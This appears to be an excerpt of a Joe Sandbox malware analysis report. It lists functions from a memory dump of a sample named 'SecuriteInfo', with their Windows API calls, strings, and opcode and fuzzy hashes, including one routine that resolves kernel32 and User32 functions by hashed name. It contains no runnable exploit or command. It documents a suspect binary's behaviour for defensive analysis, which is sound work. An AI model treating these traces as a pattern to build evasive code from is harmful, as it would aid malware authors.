                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 2168136238-4289949731
                                            • Opcode ID: 9aff258bd2a57d4d054c08222175671c041906548b8ddc4a0bd206564468f183
                                            • Instruction ID: e638ac5cdceb6eb99e02943e81275589339bcef4e0695c993049020122d0c573
                                            • Opcode Fuzzy Hash: 9aff258bd2a57d4d054c08222175671c041906548b8ddc4a0bd206564468f183
                                            • Instruction Fuzzy Hash: 5C417031304244DFD714DEDDD880A9EB7B6EB813587750A2EE492CFF40D761D84A87A2
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB480C
                                            • VariantInit.OLEAUT32(?), ref: 6CEB4815
                                            • VariantInit.OLEAUT32(?), ref: 6CEB481B
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEB4826
                                            • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CEB485B
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4868
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEB4974
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4984
                                            • VariantClear.OLEAUT32(?), ref: 6CEB498A
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4990
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 2515392200-0
                                            • Opcode ID: 126b56f8f20811de5b6722ee6caabd2c65b8571dc6394ca6219fd4d98f2035d3
                                            • Instruction ID: 275eec0a2bd051323f643feaa6d0d7c6584843f79ccfbf733c5d4ad7c339d73c
                                            • Opcode Fuzzy Hash: 126b56f8f20811de5b6722ee6caabd2c65b8571dc6394ca6219fd4d98f2035d3
                                            • Instruction Fuzzy Hash: 72513D72A002499FDB04DFA4CD80EAEB7B9FF89314F15456EE505EBA40D774A905CB60
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEADD00
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CEADD10
                                            • SafeArrayPutElement.OLEAUT32(00000000,6CEB2FFF,?), ref: 6CEADD47
                                            • VariantClear.OLEAUT32(?), ref: 6CEADD4F
                                            • SafeArrayPutElement.OLEAUT32(00000000,6CEB2FFF,?), ref: 6CEADD6D
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CEADDA4
                                            • VariantClear.OLEAUT32(?), ref: 6CEADDAC
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADE16
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADE27
                                            • VariantClear.OLEAUT32(?), ref: 6CEADE31
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                            • String ID:
                                            • API String ID: 3525949229-0
                                            • Opcode ID: 544fc5b61c80a7b0d6f8c7674b2250674915edf7d3c08efce7a031ca4d84f7e3
                                            • Instruction ID: 2324a9e3e2a95c562b0d72af919eb5b1859cd9ba59428a92793ff92a2be58e98
                                            • Opcode Fuzzy Hash: 544fc5b61c80a7b0d6f8c7674b2250674915edf7d3c08efce7a031ca4d84f7e3
                                            • Instruction Fuzzy Hash: 03515B75E01209AFDB01DFA5C884FDEBBB8FF99714F118119EA15AB710DB749901CBA0
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CEAE29B
                                            • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CEAE2B6
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEAE2D7
                                              • Part of subcall function 6CEB5760: std::tr1::_Xweak.LIBCPMT ref: 6CEB5769
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEAE309
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEAE523
                                            • InterlockedCompareExchange.KERNEL32(6CF3C6A4,45524548,4B4F4F4C), ref: 6CEAE544
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                            • String ID: .l$ .l
                                            • API String ID: 2722669376-2945158243
                                            • Opcode ID: 80d6882047aa25939c11d3177c8a3bef7e68da9475196673ce43255247837af1
                                            • Instruction ID: cfda427e7b08feb416565a712e9de066284e16b2e2ae9e4be2f2836a30bfdff8
                                            • Opcode Fuzzy Hash: 80d6882047aa25939c11d3177c8a3bef7e68da9475196673ce43255247837af1
                                            • Instruction Fuzzy Hash: 3CD1C1B1A006049FDB00DFE4C884BAE77B9AF45308F348569E815AF781D775E91ACBA1
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CECC213
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                            • API String ID: 1823113695-1254974138
                                            • Opcode ID: e3cd3a08d05684e616086ce22195e135840cc6893d3fc821926fc9e2e05c8392
                                            • Instruction ID: 73e93f5fcecc7168e7cc5a01693582822de8eddb81cae43b6b19f6f7ad530668
                                            • Opcode Fuzzy Hash: e3cd3a08d05684e616086ce22195e135840cc6893d3fc821926fc9e2e05c8392
                                            • Instruction Fuzzy Hash: B19166B1A00609AFCB18DF59DD90EEEB7B9EB88314F14861DE959DB740D730BA04CB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 2168136238-4289949731
                                            • Opcode ID: 97ecd480414b02ada19edc5e35923809078a028cb98fafeeb12c4a31bfa1aa3e
                                            • Instruction ID: 29fe88008b765aee7e3e8fd332287807009f7c3793d84811233b1a124e5a0c0a
                                            • Opcode Fuzzy Hash: 97ecd480414b02ada19edc5e35923809078a028cb98fafeeb12c4a31bfa1aa3e
                                            • Instruction Fuzzy Hash: 3D5193323011449FD724CE9CD880A5EB7B6DBC5714B348A2EE856CFB84DB71EC568792
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEF42DD
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CEF4363
                                            • _memmove.LIBCMT ref: 6CEF4381
                                            • _memmove.LIBCMT ref: 6CEF43E6
                                            • _memmove.LIBCMT ref: 6CEF4453
                                            • _memmove.LIBCMT ref: 6CEF4474
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: lgl$vector<T> too long
                                            • API String ID: 4034224661-3885013920
                                            • Opcode ID: 2c68ce88f7188ce499649d95559e85256136cccc4f191dee7dd707724646c6ce
                                            • Instruction ID: 8f69b325d1274b3836e022b8bab34b8d038e14b60abb6cb621a05f820da4adef
                                            • Opcode Fuzzy Hash: 2c68ce88f7188ce499649d95559e85256136cccc4f191dee7dd707724646c6ce
                                            • Instruction Fuzzy Hash: 9F5192B17042068FC718CF68DD8496BB7E5EBD4318F284E2DE896C3744EA75E905CA62
                                            APIs
                                            • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CEC1C5E
                                            • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CEC1C69
                                            • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CEC1CA2
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CEC1CC1
                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CEC1CCC
                                            • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CEC1D0A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AddressHandleLibraryLoadModuleProc
                                            • String ID: User32.dll$kernel32.dll
                                            • API String ID: 310444273-1965990335
                                            • Opcode ID: 8a98af6d00bb84a4973ccdb879963e50ed5a2c04b16e0e7a9c89225657604532
                                            • Instruction ID: 24848a94009e41acc7f7ecbe93f0520f89aa2d3abdcc6d6be7a6ba55fbdd7b99
                                            • Opcode Fuzzy Hash: 8a98af6d00bb84a4973ccdb879963e50ed5a2c04b16e0e7a9c89225657604532
                                            • Instruction Fuzzy Hash: 74614F75600A009FC760CF99C282A6ABBF1FB55304F74895CE4A69BF52D736EC46CB81
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBC180
                                            • SafeArrayPutElement.OLEAUT32(00000000,I7l,?), ref: 6CEBC1B8
                                            • VariantClear.OLEAUT32(?), ref: 6CEBC1C4
                                            • VariantCopy.OLEAUT32(I7l,?), ref: 6CEBC21B
                                            • VariantClear.OLEAUT32(?), ref: 6CEBC22F
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBC23E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                            • String ID: I7l$I7l
                                            • API String ID: 3979206172-4116127961
                                            • Opcode ID: 45a47eb61d50fc818e45b2dd8dd298cbe3776d9e7f391dc2ac49fb580249b513
                                            • Instruction ID: 87760ed5c156ca330c319d6814068714b6219af062b926865c331ba4c3d89dd6
                                            • Opcode Fuzzy Hash: 45a47eb61d50fc818e45b2dd8dd298cbe3776d9e7f391dc2ac49fb580249b513
                                            • Instruction Fuzzy Hash: 6F318E71B04609AFDB01DFA4C885FAEBBB8EF89314F118119E915E7750EB30D801CB60
                                            APIs
                                            • UnDecorator::getArgumentList.LIBCMT ref: 6CF0442E
                                              • Part of subcall function 6CF03FC9: Replicator::operator[].LIBCMT ref: 6CF0404C
                                              • Part of subcall function 6CF03FC9: DName::operator+=.LIBCMT ref: 6CF04054
                                            • DName::operator+.LIBCMT ref: 6CF04487
                                            • DName::DName.LIBCMT ref: 6CF044DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                            • API String ID: 834187326-2211150622
                                            • Opcode ID: 47e4685f1e2443e9b8edbcec4a1bbe2c330e752bf551037d728265ac1e0bf2dd
                                            • Instruction ID: 644c3fb35d699acb1fd7112cdbfb43ce818a80ac58b7d545831cf759d57bb129
                                            • Opcode Fuzzy Hash: 47e4685f1e2443e9b8edbcec4a1bbe2c330e752bf551037d728265ac1e0bf2dd
                                            • Instruction Fuzzy Hash: E821DEB4B14108AFCB51DF58C061AA97FF5EB56B99B108285EC09DBB12CB30D903EB90
                                            APIs
                                            • UnDecorator::UScore.LIBCMT ref: 6CF05D40
                                            • DName::DName.LIBCMT ref: 6CF05D4C
                                              • Part of subcall function 6CF03B3B: DName::doPchar.LIBCMT ref: 6CF03B6C
                                            • UnDecorator::getScopedName.LIBCMT ref: 6CF05D8B
                                            • DName::operator+=.LIBCMT ref: 6CF05D95
                                            • DName::operator+=.LIBCMT ref: 6CF05DA4
                                            • DName::operator+=.LIBCMT ref: 6CF05DB0
                                            • DName::operator+=.LIBCMT ref: 6CF05DBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                            • String ID: void
                                            • API String ID: 1480779885-3531332078
                                            • Opcode ID: f2abcaae0920636a7f67c3c154f6b03b6b45aca8192702be7fc27ef1b014d240
                                            • Instruction ID: a5720f78ac2c6800232bb06e4eeac14e602a5661f469f58a2a8d04fde75cca44
                                            • Opcode Fuzzy Hash: f2abcaae0920636a7f67c3c154f6b03b6b45aca8192702be7fc27ef1b014d240
                                            • Instruction Fuzzy Hash: D411E971B05204EFD708DB68C8A9FED7BB09B01B05F004099D4159BB90DB709A4ADB44
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEB3F7B
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB3F8D
                                            • VariantInit.OLEAUT32(?), ref: 6CEB3FB7
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB3FD0
                                            • VariantClear.OLEAUT32(?), ref: 6CEB40C9
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4105
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB4123
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4157
                                            • VariantClear.OLEAUT32(?), ref: 6CEB4168
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                            • String ID:
                                            • API String ID: 758290628-0
                                            • Opcode ID: 8eb0cbf787e8b1a6cd1dcca557997b88d03a61a0bc26c8bd83844c188575a684
                                            • Instruction ID: e8189f13b7f497465f65ee33b6909b07209f494386a3d8d6684b43c9344d7ddc
                                            • Opcode Fuzzy Hash: 8eb0cbf787e8b1a6cd1dcca557997b88d03a61a0bc26c8bd83844c188575a684
                                            • Instruction Fuzzy Hash: 847187726093819FC700DF68C98196BBBF4BBD9318F244A2DF195A7650C770E949CB92
                                            APIs
                                            • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,67D4BDE6), ref: 6CE9FC98
                                            • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,67D4BDE6), ref: 6CE9FCAD
                                            • CloseHandle.KERNEL32(?,?,?,00000000,67D4BDE6), ref: 6CE9FCB7
                                            • SetLastError.KERNEL32(00000000,?,?,00000000,67D4BDE6), ref: 6CE9FCBA
                                            • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,67D4BDE6), ref: 6CE9FD01
                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,67D4BDE6), ref: 6CE9FD14
                                            • GetLastError.KERNEL32(?,?,00000000,67D4BDE6), ref: 6CE9FD2A
                                            • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,67D4BDE6), ref: 6CE9FD6B
                                            • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,67D4BDE6), ref: 6CE9FD98
                                            Memory Dump Source
